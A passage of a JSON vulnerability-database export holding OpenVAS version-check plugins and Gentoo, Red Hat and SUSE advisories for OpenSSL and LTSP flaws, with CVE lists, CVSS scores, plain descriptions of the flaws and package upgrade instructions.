useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in components shipped with\nLTSP which allow remote attackers to compromise terminal clients.\";\ntag_solution = \"LTSP 4.2 is not maintained upstream in favor of version 5. Since version 5\nis not yet available in Gentoo, the package has been masked. We recommend\nthat users unmerge LTSP:\n\n # emerge --unmerge net-misc/ltsp\n\nIf you have a requirement for Linux Terminal Servers, please either set up\na terminal server by hand or use one of the distributions that already\nmigrated to LTSP 5. If you want to contribute to the integration of LTSP 5\nin Gentoo, or want to follow its development, find details in bug 177580.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200805-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=215699\nhttp://www.gentoo.org/security/en/glsa/glsa-200705-02.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200705-06.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200705-22.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200705-24.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200710-06.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200710-16.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200710-30.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200711-08.xml\nhttp://www.gentoo.org/security/en/glsa/glsa-200801-09.xml\nhttps://bugs.gentoo.org/177580\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200805-07.\";\n\n \n\nif(description)\n{\n script_id(61041);\n script_cve_id(\"CVE-2006-3738\",\"CVE-2007-1351\",\"CVE-2007-1667\",\"CVE-2007-2445\",\"CVE-2007-2754\",\"CVE-2007-3108\",\"CVE-2007-4730\",\"CVE-2007-4995\",\"CVE-2007-5135\",\"CVE-2007-5266\",\"CVE-2007-5268\",\"CVE-2007-5269\",\"CVE-2007-5760\",\"CVE-2007-5958\",\"CVE-2007-6427\",\"CVE-2007-6428\",\"CVE-2007-6429\",\"CVE-2008-0006\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200805-07 (ltsp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/ltsp\", unaffected: make_list(), vulnerable: make_list(\"lt 5.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-27T18:39:50", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssl (EulerOS-SA-2019-1548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4000", "CVE-2015-1792", "CVE-2006-3738", "CVE-2009-1386", "CVE-2011-4108", "CVE-2009-1377", "CVE-2015-1789", "CVE-2015-0286", "CVE-2014-3507", "CVE-2014-3571", "CVE-2009-4355", "CVE-2007-5135", "CVE-2014-8275", "CVE-2009-0590", "CVE-2015-0293", "CVE-2014-8176", "CVE-2015-0209", "CVE-2012-2110", "CVE-2019-1559", "CVE-2016-0703", "CVE-2015-1791"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191548", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1548\");\n script_version(\"2020-01-23T12:11:42+0000\");\n script_cve_id(\"CVE-2007-5135\", \"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1386\", \"CVE-2009-4355\", \"CVE-2011-4108\", \"CVE-2012-2110\", \"CVE-2014-3507\", \"CVE-2014-3571\", \"CVE-2014-8176\", \"CVE-2014-8275\", \"CVE-2015-0209\", \"CVE-2015-0286\", \"CVE-2015-0293\", \"CVE-2015-1789\", \"CVE-2015-1791\", \"CVE-2015-1792\", \"CVE-2015-4000\", \"CVE-2016-0703\", \"CVE-2019-1559\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:11:42 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:11:42 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssl (EulerOS-SA-2019-1548)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1548\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1548\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssl' package(s) announced via the EulerOS-SA-2019-1548 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A race condition was found in the session handling code of OpenSSL. This issue could possibly cause a multi-threaded TLS/SSL client using OpenSSL to double free session ticket data and crash.(CVE-2015-1791)\n\nAn out-of-bounds read flaw was found in the X509_cmp_time() function of OpenSSL, which is used to test the expiry dates of SSL/TLS certificates. An attacker could possibly use a specially crafted SSL/TLS certificate or CRL (Certificate Revocation List), which when parsed by an application would cause that application to crash.(CVE-2015-1789)\n\nThe ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.(CVE-2009-0590)\n\nAn invalid-free flaw was found in the way OpenSSL handled certain DTLS handshake messages. A malicious DTLS client or server could send a specially crafted message to the peer, which could cause the application to crash or potentially result in arbitrary code execution.(CVE-2014-8176)\n\nThe DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.(CVE-2011-4108)\n\nOff-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. As of 20071012, it is unknown whether code execution is possible.(CVE-2007-5135)\n\nA NULL pointer dereference flaw was found in the DTLS implementation of OpenSSL. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash.(CVE-2014-3571)\n\nThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.(CVE-2012-2110)\n\nIt was discovered that the SSLv2 servers using OpenSSL accepted SSLv2 connection handshakes that indicated non-zero clear key length for non-export cipher suites. An attacker could use this flaw to decrypt recorded SSLv2 sessions with the server ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'openssl' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.2k~16.h5\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.2k~16.h5\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-libs\", rpm:\"openssl-libs~1.0.2k~16.h5\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:17:13", "description": "### Background\n\nOpenSSL is a toolkit implementing the Secure Sockets Layer, Transport Layer Security protocols and a general-purpose cryptography library. The x86 emulation base libraries for AMD64 contain a vulnerable version of OpenSSL. \n\n### Description\n\nTavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers() function contains a buffer overflow vulnerability, and that the SSLv2 client code contains a flaw leading to a crash. Additionally, Dr. Stephen N. Henson found that the ASN.1 handler contains two Denial of Service vulnerabilities: while parsing an invalid ASN.1 structure and while handling certain types of public key. \n\n### Impact\n\nAn attacker could trigger the buffer overflow by sending a malicious suite of ciphers to an application using the vulnerable function, and thus execute arbitrary code with the rights of the user running the application. An attacker could also consume CPU and/or memory by exploiting the Denial of Service vulnerabilities. Finally, a malicious server could crash a SSLv2 client through the SSLv2 vulnerability. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll AMD64 x86 emulation base libraries users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/emul-linux-x86-baselibs-2.5.5\"", "cvss3": {}, "published": "2006-12-11T00:00:00", "type": "gentoo", "title": "AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-12-11T00:00:00", "id": "GLSA-200612-11", "href": "https://security.gentoo.org/glsa/200612-11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-17T19:17:46", "description": "### Background\n\nOpenSSL is a toolkit implementing the Secure Sockets Layer, Transport Layer Security protocols and a general-purpose cryptography library. \n\n### Description\n\nTavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers() function contains a buffer overflow vulnerability, and that the SSLv2 client code contains a flaw leading to a crash. Additionally Dr. Stephen N. Henson found that the ASN.1 handler contains two Denial of Service vulnerabilities: while parsing an invalid ASN.1 structure and while handling certain types of public key. \n\n### Impact\n\nAn attacker could trigger the buffer overflow vulnerability by sending a malicious suite of ciphers to an application using the vulnerable function, and thus execute arbitrary code with the rights of the user running the application. An attacker could also consume CPU and/or memory by exploiting the Denial of Service vulnerabilities. Finally a malicious server could crash a SSLv2 client through the SSLv2 vulnerability. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-0.9.8d\"\n\nAll OpenSSL 0.9.7 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-0.9.7l\"", "cvss3": {}, "published": "2006-10-24T00:00:00", "type": "gentoo", "title": "OpenSSL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-10-24T00:00:00", "id": "GLSA-200610-11", "href": "https://security.gentoo.org/glsa/200610-11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-17T19:16:17", "description": "### Background\n\nOpenSSL is an implementation of the Secure Socket Layer and Transport Layer Security protocols. \n\n### Description\n\nMoritz Jodeit reported an off-by-one error in the SSL_get_shared_ciphers() function, resulting from an incomplete fix of CVE-2006-3738. A flaw has also been reported in the BN_from_montgomery() function in crypto/bn/bn_mont.c when performing Montgomery multiplication. \n\n### Impact\n\nA remote attacker sending a specially crafted packet to an application relying on OpenSSL could possibly execute arbitrary code with the privileges of the user running the application. A local attacker could perform a side channel attack to retrieve the RSA private keys. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll OpenSSL users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-0.9.8e-r3\"", "cvss3": {}, "published": "2007-10-07T00:00:00", "type": "gentoo", "title": "OpenSSL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3738", "CVE-2007-3108", "CVE-2007-5135"], "modified": "2007-10-07T00:00:00", "id": "GLSA-200710-06", "href": "https://security.gentoo.org/glsa/200710-06", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:38:10", "description": "The OpenSSL toolkit provides support for secure communications between\r\nmachines. OpenSSL includes a certificate management tool and shared\r\nlibraries which provide various cryptographic algorithms and protocols.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\r\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\r\nattacker could send a list of ciphers to an application that used this\r\nfunction and overrun a buffer (CVE-2006-3738). Few applications make use\r\nof this vulnerable function and generally it is used only when applications\r\nare compiled for debugging.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a \r\nflaw in the SSLv2 client code. When a client application used OpenSSL to\r\ncreate an SSLv2 connection to a malicious server, that server could cause\r\nthe client to crash. (CVE-2006-4343)\r\n\r\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently\r\ndeveloped an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered\r\ndenial of service vulnerabilities: \r\n\r\n* Certain public key types can take disproportionate amounts of time to\r\nprocess, leading to a denial of service. (CVE-2006-2940)\r\n\r\n* During parsing of certain invalid ASN.1 structures an error condition was\r\nmishandled. This can result in an infinite loop which consumed system\r\nmemory (CVE-2006-2937). This issue does not affect the OpenSSL version\r\ndistributed in Red Hat Enterprise Linux 2.1.\r\n\r\nThese vulnerabilities can affect applications which use OpenSSL to parse\r\nASN.1 data from untrusted sources, including SSL servers which enable\r\nclient authentication and S/MIME applications.\r\n\r\nUsers are advised to upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.\r\n\r\nNote: After installing this update, users are advised to either restart all\r\nservices that use OpenSSL or restart their system.", "cvss3": {}, "published": "2006-09-28T00:00:00", "type": "redhat", "title": "(RHSA-2006:0695) openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2019-03-22T19:42:38", "id": "RHSA-2006:0695", "href": "https://access.redhat.com/errata/RHSA-2006:0695", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:39:02", "description": "This release corrects several security vulnerabilities in components\nshipped as part of the Red Hat Network Satellite Server Solaris client. In\na typical operating environment, these components are not used by the\nSatellite Server in a vulnerable manner. These security updates will reduce\nrisk should these components be used by other applications.\n\nSeveral flaws in Zlib were discovered. An attacker could create a\ncarefully-crafted compressed stream that would cause an application to\ncrash if the stream was opened by a user. (CVE-2005-2096, CVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL SSL_get_shared_ciphers()\nutility function. An attacker could send a list of ciphers to an\napplication that used this function and overrun a buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client application\nused OpenSSL to create an SSLv2 connection to a malicious server, that\nserver could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an RSA\nkey with exponent 3 was used an attacker could, potentially, forge a PKCS\n#1 v1.5 signature that would be incorrectly verified by implementations\nthat do not check for excess data in the RSA exponentiation result of the\nsignature. This issue affected applications that use OpenSSL to verify\nX.509 certificates as well as other uses of PKCS #1 v1.5. (CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in\nMicrosoft Internet Explorer version 3.0.2. It is enabled in most servers\nthat use OpenSSL to provide support for SSL and TLS. This work-around was\nvulnerable to a man-in-the-middle attack which allowed a remote user to\nforce an SSL connection to use SSL 2.0, rather than a stronger protocol,\nsuch as SSL 3.0 or TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures, an error\ncondition was mishandled. This could result in an infinite loop which\nconsumed system memory (CVE-2006-2937).\n\nCertain public key types could take disproportionate amounts of time to\nprocess in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the Python repr() function's handling of\nUTF-32/UCS-4 strings. If an application used the repr() function on\nuntrusted data, this could lead to a denial of service or, possibly, allow\nthe execution of arbitrary code with the privileges of the application\nusing the flawed function. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale module.\nStrings generated by this function were not properly NULL-terminated. This\ncould, potentially, cause disclosure of data stored in the memory of an\napplication using this function. (CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop module.\nIf an application used the imageop module to process untrusted images, it\ncould cause the application to crash, enter an infinite loop, or, possibly,\nexecute arbitrary code with the privileges of the Python interpreter.\n(CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python interpreter,\nwhich could allow a local user to gain privileges by running a script with\na long name from the current working directory. (CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these updated\npackages, which contain backported patches to correct these issues.", "cvss3": {}, "published": "2008-08-13T00:00:00", "type": "redhat", "title": "(RHSA-2008:0629) Moderate: Red Hat Network Satellite Server Solaris client security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2019-03-22T19:44:55", "id": "RHSA-2008:0629", "href": "https://access.redhat.com/errata/RHSA-2008:0629", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:40:11", "description": "This release corrects several security vulnerabilities in various\ncomponents shipped as part of the Red Hat Network Satellite Server Solaris\nclient. In a typical operating environment, these components are not used\nby the Satellite Server in a vulnerable manner. These security updates will\nreduce risk should these components be used by other applications.\n\nSeveral flaws in Zlib was discovered. An attacker could create a\ncarefully-crafted compressed stream that would cause an application to\ncrash if the stream is opened by a user. (CVE-2005-2096). An attacker\ncould create a carefully crafted compressed stream that would cause an\napplication to crash if the stream is opened by a user. (CVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL SSL_get_shared_ciphers()\nutility function. An attacker could send a list of ciphers to an\napplication that used this function and overrun a buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client application\nused OpenSSL to create an SSLv2 connection to a malicious server, that\nserver could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an RSA\nkey with exponent 3 is used it may be possible for an attacker to forge a\nPKCS #1 v1.5 signature that would be incorrectly verified by\nimplementations that do not check for excess data in the RSA exponentiation\nresult of the signature. This issue affected applications that use OpenSSL\nto verify X.509 certificates as well as other uses of PKCS #1 v1.5.\n(CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in\nMicrosoft Internet Explorer version 3.0.2. It is enabled in most servers\nthat use OpenSSL to provide support for SSL and TLS. This work-around could\nallow an attacker, acting as a \"man in the middle\" to force an SSL\nconnection to use SSL 2.0 rather than a stronger protocol, such as SSL 3.0\nor TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937). \n\nCertain public key types can take disproportionate amounts of time to\nprocess in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the way that the Python repr() function handled\nUTF-32/UCS-4 strings. If an application written in Python used the repr()\nfunction on untrusted data, this could lead to a denial of service or\npossibly allow the execution of arbitrary code with the privileges of the\nPython application. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale module.\nStrings generated by this function were not properly NULL-terminated. This\nmay possibly cause disclosure of data stored in the memory of a Python\napplication using this function. (CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop module.\nIf an application written in Python used the imageop module to process\nuntrusted images, it could cause the application to crash, enter an\ninfinite loop, or possibly execute arbitrary code with the privileges of\nthe Python interpreter. (CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python interpreter,\nwhich could allow a local user to gain privileges by running a script with\na long name from the current working directory. (CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these updated\npackages, which contain backported patches to correct these issues. ", "cvss3": {}, "published": "2008-06-30T00:00:00", "type": "redhat", "title": "(RHSA-2008:0525) Moderate: Red Hat Network Satellite Server Solaris client security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2019-03-22T19:44:30", "id": "RHSA-2008:0525", "href": "https://access.redhat.com/errata/RHSA-2008:0525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:40:16", "description": "This release corrects several security vulnerabilities in various\ncomponents shipped as part of the Red Hat Network Satellite Server Solaris\nclient. In a typical operating environment, these components are not used\nby the Satellite Server in a vulnerable manner. These security updates will\nreduce risk should these components be used by other applications.\n\nTwo denial-of-service flaws were fixed in ZLib. (CVE-2005-2096,\nCVE-2005-1849)\n\nMultiple flaws were fixed in OpenSSL. (CVE-2006-4343, CVE-2006-4339,\nCVE-2006-3738, CVE-2006-2940, CVE-2006-2937, CVE-2005-2969)\n\nMultiple flaws were fixed in Python. (CVE-2007-4965, CVE-2007-2052,\nCVE-2006-4980, CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server 5.0.1 are advised to upgrade to\n5.0.2, which resolves these issues.", "cvss3": {}, "published": "2008-05-20T00:00:00", "type": "redhat", "title": "(RHSA-2008:0264) Moderate: Red Hat Network Satellite Server Solaris client security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2019-03-22T19:44:35", "id": "RHSA-2008:0264", "href": "https://access.redhat.com/errata/RHSA-2008:0264", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:15:18", "description": "Several security problems were found and fixed in the OpenSSL cryptographic library.\n#### Solution\nThere is no known workaround, please install the update packages.", "cvss3": {}, "published": "2006-09-28T16:40:53", "type": "suse", "title": "remote denial of service in openssl", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2006-09-28T16:40:53", "id": "SUSE-SA:2006:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-09/msg00025.html", "cvss": {"score": 10.0, 